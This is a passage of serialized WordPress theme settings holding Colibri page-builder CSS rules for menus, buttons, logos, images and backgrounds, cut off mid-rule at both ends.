ul.colibri-menu li > ul  li > a > svg,#colibri .style-205 >  div > .colibri-menu-container > ul.colibri-menu li > ul  li > a >  .arrow-wrapper {\n  color: white;\n  padding-right: 20px;\n  padding-left: 20px;\n}\n#colibri .style-205 >  div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > svg,#colibri .style-205 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > svg,#colibri .style-205 >  div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > .arrow-wrapper,#colibri .style-205 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > .arrow-wrapper {\n  color: white;\n  padding-right: 20px;\n  padding-left: 20px;\n}\n#colibri .style-205 >  div > .colibri-menu-container > ul.colibri-menu  li > a > svg,#colibri .style-205 >  div > .colibri-menu-container > ul.colibri-menu  li > a >  .arrow-wrapper {\n  padding-right: 20px;\n  padding-left: 20px;\n  color: black;\n}\n#colibri .style-205 >  div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > svg,#colibri .style-205 >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > svg,#colibri .style-205 >  div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > .arrow-wrapper,#colibri .style-205 >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > .arrow-wrapper {\n  padding-right: 20px;\n  padding-left: 20px;\n  color: black;\n}\n#colibri .style-205 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li > a {\n  font-size: 14px;\n  color: white;\n  padding-top: 12px;\n  padding-bottom: 12px;\n  padding-left: 40px;\n  border-top-width: 0px;\n  border-top-color: #808080;\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: #808080;\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: #808080;\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: #808080;\n  border-left-style: solid;\n}\n#colibri .style-205 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a,#colibri .style-205  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a:hover {\n  font-size: 14px;\n  color: white;\n  padding-top: 12px;\n  padding-bottom: 12px;\n  padding-left: 40px;\n  border-top-width: 0px;\n  border-top-color: #808080;\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: #808080;\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: #808080;\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: #808080;\n  border-left-style: solid;\n}\n#colibri .style-205 >  div > .colibri-menu-container > ul.colibri-menu > li > a {\n  font-size: 14px;\n  color: white;\n  padding-top: 12px;\n  padding-bottom: 12px;\n  padding-left: 40px;\n  border-top-width: 0px;\n  border-top-color: #808080;\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: #808080;\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: #808080;\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: #808080;\n  border-left-style: solid;\n}\n#colibri .style-205  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .style-205  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover {\n  font-size: 14px;\n  color: white;\n  padding-top: 12px;\n  padding-bottom: 12px;\n  padding-left: 40px;\n  border-top-width: 0px;\n  border-top-color: #808080;\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: #808080;\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: #808080;\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: #808080;\n  border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:206;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:207;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-207 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:208;a:3:{s:7:\"desktop\";s:505:\"#colibri .style-208-image {\n  max-height: 70px;\n}\n#colibri .style-208 a,#colibri .style-208  .logo-text {\n  color: #ffffff;\n  text-decoration: none;\n}\n#colibri .h-navigation_sticky .style-208-image,#colibri .h-navigation_sticky.style-208-image {\n  max-height: 70px;\n}\n#colibri .h-navigation_sticky .style-208 a,#colibri .h-navigation_sticky .style-208  .logo-text,#colibri .h-navigation_sticky.style-208 a,#colibri .h-navigation_sticky.style-208  .logo-text {\n  color: #000000;\n  text-decoration: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:209;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:210;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-210 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:211;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-211 ul {\n  list-style-type: disc;\n}\n#colibri .style-211 ol {\n  list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:212;a:3:{s:7:\"desktop\";s:689:\"#colibri .style-212 {\n  min-height: 100vh;\n  color: #f6f8fa;\n  background-position: 48.828125% 48.69319869319869%;\n  background-size: cover;\n  background-image: url(\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-cropped-header-scaled-1.jpg\");\n  background-attachment: scroll;\n  background-repeat: no-repeat;\n  padding-top: 150px;\n  padding-bottom: 150px;\n}\n#colibri .style-212 h1 {\n  color: #f6f8fa;\n}\n#colibri .style-212 h2 {\n  color: #f6f8fa;\n}\n#colibri .style-212 h3 {\n  color: #f6f8fa;\n}\n#colibri .style-212 h4 {\n  color: #f6f8fa;\n}\n#colibri .style-212 h5 {\n  color: #f6f8fa;\n}\n#colibri .style-212 h6 {\n  color: #f6f8fa;\n}\n#colibri .style-212 p {\n  color: #f6f8fa;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:130:\"#colibri .style-212 {\n  background-image: url(\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/colibri-image-298.png\");\n}\n\";}i:213;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:214;a:3:{s:7:\"desktop\";s:435:\"#colibri .style-214 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  border-top-width: 0px;\n  border-top-style: solid;\n  border-top-left-radius: 9px;\n  border-top-right-radius: 9px;\n  border-right-width: 0px;\n  border-right-style: solid;\n  border-bottom-width: 0px;\n  border-bottom-style: solid;\n  border-bottom-left-radius: 9px;\n  border-bottom-right-radius: 9px;\n  border-left-width: 0px;\n  border-left-style: solid;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:215;a:3:{s:7:\"desktop\";s:356:\"#colibri .style-215 p,#colibri .style-215  h1,#colibri .style-215  h2,#colibri .style-215  h3,#colibri .style-215  h4,#colibri .style-215  h5,#colibri .style-215  h6 {\n  font-weight: 600;\n  color: #202a54;\n}\n#colibri .style-215 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:216;a:3:{s:7:\"desktop\";s:193:\"#colibri .style-216 {\n  color: #202a54;\n}\n#colibri .style-216 p {\n  color: #202a54;\n}\n#colibri .style-216 ol {\n  list-style-type: decimal;\n}\n#colibri .style-216 ul {\n  list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:217;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:218;a:3:{s:7:\"desktop\";s:1309:\"#colibri .style-218-icon {\n  width: 12px;\n  height: 12px;\n  margin-right: 10px;\n  margin-left: 0px;\n}\n#colibri .style-218 {\n  background-color: #303e7a;\n  background-image: none;\n  font-family: Open Sans;\n  font-weight: 600;\n  text-transform: uppercase;\n  font-size: 12px;\n  line-height: 1;\n  letter-spacing: 1px;\n  color: white;\n  border-top-width: 2px;\n  border-top-color: #303e7a;\n  border-top-style: solid;\n  border-top-left-radius: 56px;\n  border-top-right-radius: 56px;\n  border-right-width: 2px;\n  border-right-color: #303e7a;\n  border-right-style: solid;\n  border-bottom-width: 2px;\n  border-bottom-color: #303e7a;\n  border-bottom-style: solid;\n  border-bottom-left-radius: 56px;\n  border-bottom-right-radius: 56px;\n  border-left-width: 2px;\n  border-left-color: #303e7a;\n  border-left-style: solid;\n  padding-top: 12px;\n  padding-right: 24px;\n  padding-bottom: 12px;\n  padding-left: 24px;\n  text-align: center;\n  box-shadow: none;\n}\n#colibri .style-218:hover,#colibri .style-218:focus {\n  background-color: rgb(7, 29, 122);\n  border-top-color: rgb(7, 29, 122);\n  border-right-color: rgb(7, 29, 122);\n  border-bottom-color: rgb(7, 29, 122);\n  border-left-color: rgb(7, 29, 122);\n}\n#colibri .style-218:active .style-218-icon {\n  width: 12px;\n  height: 12px;\n  margin-right: 10px;\n  margin-left: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:219;a:3:{s:7:\"desktop\";s:1264:\"#colibri .style-219-icon {\n  width: 14px;\n  height: 14px;\n  margin-right: 10px;\n  margin-left: 0px;\n}\n#colibri .style-219 {\n  background-color: transparent;\n  background-image: none;\n  font-family: Open Sans;\n  font-weight: 600;\n  text-transform: uppercase;\n  font-size: 14px;\n  line-height: 1em;\n  letter-spacing: 1px;\n  color: white;\n  border-top-width: 2px;\n  border-top-color: white;\n  border-top-style: solid;\n  border-top-left-radius: 56px;\n  border-top-right-radius: 56px;\n  border-right-width: 2px;\n  border-right-color: white;\n  border-right-style: solid;\n  border-bottom-width: 2px;\n  border-bottom-color: white;\n  border-bottom-style: solid;\n  border-bottom-left-radius: 56px;\n  border-bottom-right-radius: 56px;\n  border-left-width: 2px;\n  border-left-color: white;\n  border-left-style: solid;\n  padding-top: 15px;\n  padding-right: 30px;\n  padding-bottom: 15px;\n  padding-left: 30px;\n  text-align: center;\n}\n#colibri .style-219:hover,#colibri .style-219:focus {\n  background-color: rgba(255, 255, 255, 0.2);\n  border-top-color: #FFFFFF;\n  border-right-color: #FFFFFF;\n  border-bottom-color: #FFFFFF;\n  border-left-color: #FFFFFF;\n}\n#colibri .style-219:active .style-219-icon {\n  width: 14px;\n  height: 14px;\n  margin-right: 10px;\n  margin-left: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:220;a:3:{s:7:\"desktop\";s:138:\"#colibri .style-220 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n  background-color: #202a54;\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:221;a:3:{s:7:\"desktop\";s:1445:\"#colibri .style-221-image {\n  opacity: 1;\n  border-top-width: 0px;\n  border-top-color: #303e7a;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-color: #303e7a;\n  border-right-style: none;\n  border-bottom-width: 10px;\n  border-bottom-color: #303e7a;\n  border-bottom-style: none;\n  border-left-width: 0px;\n  border-left-color: #303e7a;\n  border-left-style: none;\n  box-shadow: 0px 0px 10px 2px rgba(0,0,0,0.5) ;\n}\n#colibri .style-221-overlay {\n  border-top-width: 0px;\n  border-top-color: #303e7a;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-color: #303e7a;\n  border-right-style: none;\n  border-bottom-width: 10px;\n  border-bottom-color: #303e7a;\n  border-bottom-style: none;\n  border-left-width: 0px;\n  border-left-color: #303e7a;\n  border-left-style: none;\n  background-color: unset;\n  background-image: none;\n}\n#colibri .style-221-caption {\n  margin-top: 10px;\n}\n#colibri .style-221-frameImage {\n  z-index: -1;\n  transform: translateX(7%) translateY(-8%);\n  transform-origin: center center 0px;\n  background-color: #f7e597;\n  height: 120%;\n  width: 100% ;\n  border-top-width: 10px;\n  border-top-color: #f7e597;\n  border-top-style: none;\n  border-right-width: 10px;\n  border-right-color: #f7e597;\n  border-right-style: none;\n  border-bottom-width: 10px;\n  border-bottom-color: #f7e597;\n  border-bottom-style: none;\n  border-left-width: 10px;\n  border-left-color: #f7e597;\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:222;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:223;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:224;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:225;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:226;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:227;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:228;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:229;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:230;a:3:{s:7:\"desktop\";s:120:\"#colibri .style-230 {\n  background-color: black;\n  background-image: none;\n  padding-top: 5px;\n  padding-bottom: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:231;a:3:{s:7:\"desktop\";s:81:\"#colibri .style-231 {\n  text-align: left;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:232;a:3:{s:7:\"desktop\";s:1285:\"#colibri .style-232-icon {\n  fill: #FFFFFF;\n  width: 18px ;\n  height: 18px;\n  padding-left: 0px;\n  border-top-width: 2px;\n  border-top-color: #03a9f4;\n  border-top-style: none;\n  border-right-width: 2px;\n  border-right-color: #03a9f4;\n  border-right-style: none;\n  border-bottom-width: 2px;\n  border-bottom-color: #03a9f4;\n  border-bottom-style: none;\n  border-left-width: 2px;\n  border-left-color: #03a9f4;\n  border-left-style: none;\n}\n#colibri .style-232-icon:hover {\n  background-color: rgba(3, 169, 244, 0);\n  background-image: none;\n}\n#colibri .style-232 .list-container-divider {\n  width: 1px ;\n  padding-top: 0px;\n  padding-right: 10px;\n  padding-bottom: 0px;\n  padding-left: 10px;\n  height: 100%;\n}\n#colibri .style-232 .list-divider {\n  color: rgb(0,0,0);\n  width: 100% ;\n  height: 100%;\n  border-top-width: 0px;\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-style: solid;\n  border-bottom-width: 0px;\n  border-bottom-color: rgb(0,0,0);\n  border-bottom-style: solid;\n  border-left-width: 1px;\n  border-left-style: solid;\n  margin-left: 0px;\n}\n#colibri .style-232 .list-text {\n  margin-left: 5px;\n  color: #FFFFFF;\n  font-size: 14px;\n}\n#colibri .style-232 .list-item-text-wrapper {\n  horizontal-align: start;\n  padding-right: 0px;\n  padding-bottom: 0px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:233;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-233 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:234;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-234 .icon-container {\n  fill: rgb(204, 204, 204);\n  width: 20px ;\n  height: 20px;\n}\n#colibri .style-234 .icon-container:hover {\n  fill: #FFFFFF;\n}\n#colibri .style-234 .icon-container:hover {\n  fill: #FFFFFF;\n}\n#colibri .style-234 .social-icon-container {\n  margin-right: 0px;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:243;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-243 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:244;a:3:{s:7:\"desktop\";s:472:\"#colibri .style-244 {\n  animation-duration: 0.5s;\n  padding-top: 0px;\n  padding-bottom: 0px;\n  background-color: #ffffff;\n  background-image: none;\n}\n#colibri .style-244 mobile padding top {\n  unit: px;\n  value: 0;\n}\n#colibri .style-244 mobile padding bottom {\n  unit: px;\n  value: 0;\n}\n#colibri .h-navigation_sticky .style-244,#colibri .h-navigation_sticky.style-244 {\n  padding-top: 10px;\n  padding-bottom: 10px;\n  background-color: #ffffff;\n  background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:245;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:246;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-246 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:247;a:3:{s:7:\"desktop\";s:505:\"#colibri .style-247-image {\n  max-height: 70px;\n}\n#colibri .style-247 a,#colibri .style-247  .logo-text {\n  color: #ffffff;\n  text-decoration: none;\n}\n#colibri .h-navigation_sticky .style-247-image,#colibri .h-navigation_sticky.style-247-image {\n  max-height: 70px;\n}\n#colibri .h-navigation_sticky .style-247 a,#colibri .h-navigation_sticky .style-247  .logo-text,#colibri .h-navigation_sticky.style-247 a,#colibri .h-navigation_sticky.style-247  .logo-text {\n  color: #000000;\n  text-decoration: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:248;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-248 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:249;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-249 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:250;a:3:{s:7:\"desktop\";s:5892:\"#colibri .style-250 >  div > .colibri-menu-container > ul.colibri-menu {\n  justify-content: flex-start;\n}\n#colibri .style-250 >  div > .colibri-menu-container > ul.colibri-menu > li {\n  margin-top: 0px;\n  margin-right: 10px;\n  margin-bottom: 0px;\n  margin-left: 10px;\n  padding-top: 10px;\n  padding-right: 20px;\n  padding-bottom: 10px;\n  padding-left: 20px;\n}\n#colibri .style-250 >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item,#colibri .style-250  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover {\n  margin-top: 0px;\n  margin-right: 10px;\n  margin-bottom: 0px;\n  margin-left: 10px;\n  padding-top: 10px;\n  padding-right: 20px;\n  padding-bottom: 10px;\n  padding-left: 20px;\n}\n#colibri .style-250 >  div > .colibri-menu-container > ul.colibri-menu > li > a {\n  font-size: 14px;\n  color: black;\n}\n#colibri .style-250  >  div > .colibri-menu-container > ul.colibri-menu > li.hover  > a {\n  color: #d8d8d8;\n}\n#colibri .style-250  >  div > .colibri-menu-container > ul.colibri-menu > li:hover > a,#colibri .style-250  >  div > .colibri-menu-container > ul.colibri-menu > li.hover  > a {\n  color: #d8d8d8;\n}\n#colibri .style-250  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .style-250  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover {\n  font-size: 14px;\n  color: black;\n}\n#colibri .style-250 >  div > .colibri-menu-container > ul.colibri-menu li > ul {\n  background-color: #ffffff;\n  background-image: none;\n  margin-right: 5px;\n  margin-left: 5px;\n}\n#colibri .style-250 >  div > .colibri-menu-container > ul.colibri-menu li > ul  li {\n  padding-top: 10px;\n  padding-right: 20px;\n  padding-bottom: 10px;\n  padding-left: 20px;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 1px;\n  border-bottom-color: rgba(128,128,128,.2);\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-250  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover {\n  background-color: #F8F8F8;\n  background-image: none;\n}\n#colibri .style-250  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li:hover,#colibri .style-250  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.hover {\n  background-color: #F8F8F8;\n  background-image: none;\n}\n#colibri .style-250 >  div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item,#colibri .style-250  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover {\n  padding-top: 10px;\n  padding-right: 20px;\n  padding-bottom: 10px;\n  padding-left: 20px;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 1px;\n  border-bottom-color: rgba(128,128,128,.2);\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-250 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li > a {\n  font-size: 14px;\n  color: #6B7C93;\n}\n#colibri .style-250 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a,#colibri .style-250  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a:hover {\n  font-size: 14px;\n  color: #6B7C93;\n}\n#colibri .style-250 >  div > .colibri-menu-container > ul.colibri-menu.bordered-active-item > li::after,#colibri .style-250 \n      ul.colibri-menu.bordered-active-item > li::before {\n  background-color: white;\n  background-image: none;\n  height: 3px;\n}\n#colibri .style-250 >  div > .colibri-menu-container > ul.colibri-menu.solid-active-item > li::after,#colibri .style-250 \n      ul.colibri-menu.solid-active-item > li::before {\n  background-color: white;\n  background-image: none;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 0%;\n  border-top-right-radius: 0%;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 0%;\n  border-bottom-right-radius: 0%;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-250 >  div > .colibri-menu-container > ul.colibri-menu > li > ul {\n  margin-top: 0px;\n}\n#colibri .style-250 >  div > .colibri-menu-container > ul.colibri-menu > li > ul::before {\n  height: 0px;\n  width: 100% ;\n}\n#colibri .style-250 >  div > .colibri-menu-container > ul.colibri-menu  li > a > svg,#colibri .style-250 >  div > .colibri-menu-container > ul.colibri-menu  li > a >  .arrow-wrapper {\n  padding-right: 5px;\n  padding-left: 5px;\n  color: black;\n}\n#colibri .style-250 >  div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > svg,#colibri .style-250 >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > svg,#colibri .style-250 >  div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > .arrow-wrapper,#colibri .style-250 >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > .arrow-wrapper {\n  padding-right: 5px;\n  padding-left: 5px;\n  color: black;\n}\n#colibri .style-250 >  div > .colibri-menu-container > ul.colibri-menu li > ul  li > a > svg,#colibri .style-250 >  div > .colibri-menu-container > ul.colibri-menu li > ul  li > a >  .arrow-wrapper {\n  color: black;\n}\n#colibri .style-250 >  div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > svg,#colibri .style-250 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > svg,#colibri .style-250 >  div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > .arrow-wrapper,#colibri .style-250 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > .arrow-wrapper {\n  color: black;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:251;a:3:{s:7:\"desktop\";s:931:\"#colibri .style-251-offscreen {\n  background-color: #222B34;\n  background-image: none;\n  width: 300px !important;\n}\n#colibri .style-251-offscreenOverlay {\n  background-color: rgba(0,0,0,0.5);\n  background-image: none;\n}\n#colibri .style-251  .h-hamburger-icon {\n  background-color: rgba(0, 0, 0, 0.1);\n  background-image: none;\n  border-top-width: 0px;\n  border-top-color: black;\n  border-top-style: solid;\n  border-top-left-radius: 100%;\n  border-top-right-radius: 100%;\n  border-right-width: 0px;\n  border-right-color: black;\n  border-right-style: solid;\n  border-bottom-width: 0px;\n  border-bottom-color: black;\n  border-bottom-style: solid;\n  border-bottom-left-radius: 100%;\n  border-bottom-right-radius: 100%;\n  border-left-width: 0px;\n  border-left-color: black;\n  border-left-style: solid;\n  fill: white;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n  width: 24px;\n  height: 24px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:252;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:253;a:3:{s:7:\"desktop\";s:3947:\"#colibri .style-253 >  div > .colibri-menu-container > ul.colibri-menu > li > a {\n  padding-top: 12px;\n  padding-bottom: 12px;\n  padding-left: 40px;\n  border-top-width: 0px;\n  border-top-color: #808080;\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: #808080;\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: #808080;\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: #808080;\n  border-left-style: solid;\n  font-size: 14px;\n  color: white;\n}\n#colibri .style-253  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a,#colibri .style-253  >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item > a:hover {\n  padding-top: 12px;\n  padding-bottom: 12px;\n  padding-left: 40px;\n  border-top-width: 0px;\n  border-top-color: #808080;\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: #808080;\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: #808080;\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: #808080;\n  border-left-style: solid;\n  font-size: 14px;\n  color: white;\n}\n#colibri .style-253 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li > a {\n  padding-top: 12px;\n  padding-bottom: 12px;\n  padding-left: 40px;\n  border-top-width: 0px;\n  border-top-color: #808080;\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: #808080;\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: #808080;\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: #808080;\n  border-left-style: solid;\n  font-size: 14px;\n  color: white;\n}\n#colibri .style-253 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a,#colibri .style-253  >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item > a:hover {\n  padding-top: 12px;\n  padding-bottom: 12px;\n  padding-left: 40px;\n  border-top-width: 0px;\n  border-top-color: #808080;\n  border-top-style: solid;\n  border-right-width: 0px;\n  border-right-color: #808080;\n  border-right-style: solid;\n  border-bottom-width: 1px;\n  border-bottom-color: #808080;\n  border-bottom-style: solid;\n  border-left-width: 0px;\n  border-left-color: #808080;\n  border-left-style: solid;\n  font-size: 14px;\n  color: white;\n}\n#colibri .style-253 >  div > .colibri-menu-container > ul.colibri-menu  li > a > svg,#colibri .style-253 >  div > .colibri-menu-container > ul.colibri-menu  li > a >  .arrow-wrapper {\n  padding-right: 20px;\n  padding-left: 20px;\n  color: black;\n}\n#colibri .style-253 >  div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > svg,#colibri .style-253 >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > svg,#colibri .style-253 >  div > .colibri-menu-container > ul.colibri-menu li.current_page_item > a > .arrow-wrapper,#colibri .style-253 >  div > .colibri-menu-container > ul.colibri-menu > li.current_page_item:hover > a > .arrow-wrapper {\n  padding-right: 20px;\n  padding-left: 20px;\n  color: black;\n}\n#colibri .style-253 >  div > .colibri-menu-container > ul.colibri-menu li > ul  li > a > svg,#colibri .style-253 >  div > .colibri-menu-container > ul.colibri-menu li > ul  li > a >  .arrow-wrapper {\n  color: white;\n  padding-right: 20px;\n  padding-left: 20px;\n}\n#colibri .style-253 >  div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > svg,#colibri .style-253 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > svg,#colibri .style-253 >  div > .colibri-menu-container > ul.colibri-menu li > ul li.current_page_item > a > .arrow-wrapper,#colibri .style-253 >  div > .colibri-menu-container > ul.colibri-menu li > ul > li.current_page_item:hover > a > .arrow-wrapper {\n  color: white;\n  padding-right: 20px;\n  padding-left: 